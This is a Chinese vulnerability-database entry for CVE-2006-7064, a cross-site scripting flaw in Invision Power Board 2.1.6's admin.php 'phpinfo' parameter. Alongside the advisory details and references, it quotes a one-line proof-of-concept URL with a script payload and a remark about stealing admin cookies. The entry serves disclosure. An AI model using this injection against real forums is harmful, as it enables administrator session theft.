Invision Power Board 'forum/admin.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191586 漏洞类型 跨站脚本
发布时间 2007-02-23 更新时间 2007-02-23
CVE编号 CVE-2006-7064 CNNVD-ID CNNVD-200702-458
漏洞平台 N/A CVSS评分 9.3
|漏洞来源
https://www.securityfocus.com/bid/82123
https://cxsecurity.com/issue/WLB-2007030005
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-458
|漏洞详情
InvisionPowerBoard(IPB)2.1.6及之前版本的forum/admin.php中存在跨站脚本攻击漏洞。远程攻击者可以通过phpinfo参数,以管理员的身份注入任意的web脚本或HTML。
|漏洞EXP
*//Product  :Invision Power Board
*//Version :2.1.6 and prior versions must be affected.

*//XSS=
http://localhost/forum/admin.php?phpinfo=<script>alert()</script> 

*//You can steal only admins cookie.

*//www.spymastersnake.org
*//kepche<img src="/imgs/at.gif" border=0 align=middle>msn.com
|受影响的产品
Invision Power Services Invision Power Board 3.1.3 Invision Power Services Invision Power Board 1.2.2 Invision Power Services Invision Power Board 2.1.6 Invision Power Services Invision Power Board 2.1.5
|参考资料

来源:XF
名称:ipb-admin-phpinfo-xss(27069)
链接:http://xforce.iss.net/xforce/xfdb/27069
来源:BID
名称:18450
链接:http://www.securityfocus.com/bid/18450
来源:BUGTRAQ
名称:20060609InvisionPowerBoardXSS
链接:http://archives.neohapsis.com/archives/bugtraq/2006-06/0204.html
来源:SREASON
名称:2307
链接:http://securityreason.com/securityalert/2307